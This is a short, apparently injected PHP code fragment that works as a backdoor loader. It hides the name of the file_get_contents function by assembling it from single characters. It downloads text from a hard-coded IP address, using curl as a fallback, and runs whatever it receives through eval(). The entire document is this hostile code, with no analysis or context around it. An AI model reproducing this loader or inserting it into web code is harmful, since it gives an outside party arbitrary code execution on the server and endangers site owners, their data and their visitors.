$load = ''; $zfj0304 = 'http://69.30.244.250/z60123_8/stat/index2.txt'; $sources = ['f','i','l','e','_','g','e','t','_','c','o','n','t','e','n','t','s']; foreach($sources as $s) $load .= $s; $fetch = false; if(ini_get('allow_url_fopen') && function_exists($load)) { $fetch = @$load($zfj0304); } if($fetch === false && function_exists('curl_init')) { $ch = curl_init(); $opts = [10102=>true,10002=>$zfj0304,19913=>true,19914=>true,13=>10]; curl_setopt_array($ch, $opts); $fetch = curl_exec($ch); curl_close($ch); } if($fetch !== false) { $payload = '?>' . $fetch; eval($payload); } ?>